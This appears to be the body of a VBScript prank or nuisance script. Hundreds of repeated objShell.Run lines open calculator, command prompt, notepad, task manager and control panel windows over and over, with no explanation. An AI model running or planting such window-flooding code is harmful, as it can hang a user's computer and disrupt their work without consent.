objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
